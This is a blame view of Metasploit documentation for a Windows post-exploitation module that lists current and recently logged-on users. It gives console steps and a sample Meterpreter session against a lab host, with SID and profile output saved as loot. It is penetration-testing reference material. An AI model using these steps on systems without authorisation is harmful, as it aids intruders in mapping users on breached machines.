adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/post/windows/gather/enum_logged_on_users.md
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

62 lines
1.8 KiB
Markdown
Raw Normal View History

Create enum_logged_on_users.md
2019-12-13 12:52:29 -07:00
## Vulnerable Application
This module will enumerate current and recently logged on Windows users.
## Verification Steps
enum_logged_on_users: Cleanup
2022-08-08 01:50:36 +10:00
1. Start msfconsole
2. Get a session
3. Do: `use post/windows/gather/enum_logged_on_users`
4. Do: `set SESSION <session id>`
5. Do: `run`
Create enum_logged_on_users.md
2019-12-13 12:52:29 -07:00
## Options
enum_logged_on_users: Cleanup
2022-08-08 01:50:36 +10:00
### CURRENT
Create enum_logged_on_users.md
2019-12-13 12:52:29 -07:00
enum_logged_on_users: Cleanup
2022-08-08 01:50:36 +10:00
Enumerate currently logged on users. (default: `true`)
More formatting
2019-12-14 13:53:01 -07:00
enum_logged_on_users: Cleanup
2022-08-08 01:50:36 +10:00
### RECENT
Create enum_logged_on_users.md
2019-12-13 12:52:29 -07:00
enum_logged_on_users: Cleanup
2022-08-08 01:50:36 +10:00
Enumerate recently logged on users. (default: `true`)
More formatting
2019-12-14 13:53:01 -07:00
Create enum_logged_on_users.md
2019-12-13 12:52:29 -07:00
## Scenarios
OS
2019-12-15 16:45:57 -07:00
### Windows 7 (6.1 Build 7601, Service Pack 1).
enum_logged_on_users: Cleanup
2022-08-08 01:50:36 +10:00
```
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49196) at 2019-12-13 04:36:54 -0700
Create enum_logged_on_users.md
2019-12-13 12:52:29 -07:00
enum_logged_on_users: Cleanup
2022-08-08 01:50:36 +10:00
msf exploit(multi/handler) > use post/windows/gather/enum_logged_on_users
msf post(windows/gather/enum_logged_on_users) > set SESSION 1
SESSION => 1
msf post(windows/gather/enum_logged_on_users) > run
Create enum_logged_on_users.md
2019-12-13 12:52:29 -07:00
enum_logged_on_users: Cleanup
2022-08-08 01:50:36 +10:00
[*] Running module against TEST-PC (192.168.1.10)
Create enum_logged_on_users.md
2019-12-13 12:52:29 -07:00
enum_logged_on_users: Cleanup
2022-08-08 01:50:36 +10:00
Current Logged Users
====================
Create enum_logged_on_users.md
2019-12-13 12:52:29 -07:00
enum_logged_on_users: Cleanup
2022-08-08 01:50:36 +10:00
SID User
--- ----
S-1-5-21-3113421791-4205713440-112141152-1000 TEST-PC\TEST
Create enum_logged_on_users.md
2019-12-13 12:52:29 -07:00
enum_logged_on_users: Cleanup
2022-08-08 01:50:36 +10:00
[+] Results saved in: /root/.msf4/loot/20191213054456_default_192.168.1.10_host.users.activ_424278.txt
Create enum_logged_on_users.md
2019-12-13 12:52:29 -07:00
enum_logged_on_users: Cleanup
2022-08-08 01:50:36 +10:00
Recently Logged Users
=====================
Create enum_logged_on_users.md
2019-12-13 12:52:29 -07:00
enum_logged_on_users: Cleanup
2022-08-08 01:50:36 +10:00
SID Profile Path
--- ------------
S-1-5-18 %systemroot%\system32\config\systemprofile
S-1-5-19 C:\Windows\ServiceProfiles\LocalService
S-1-5-20 C:\Windows\ServiceProfiles\NetworkService
S-1-5-21-3113421791-4205713440-112141152-1000 C:\Users\TEST
Create enum_logged_on_users.md
2019-12-13 12:52:29 -07:00
enum_logged_on_users: Cleanup
2022-08-08 01:50:36 +10:00
[+] Results saved in: /root/.msf4/loot/20191213054458_default_192.168.1.10_host.users.recen_365577.txt
[*] Post module execution completed
```
Reference in New Issue Copy Permalink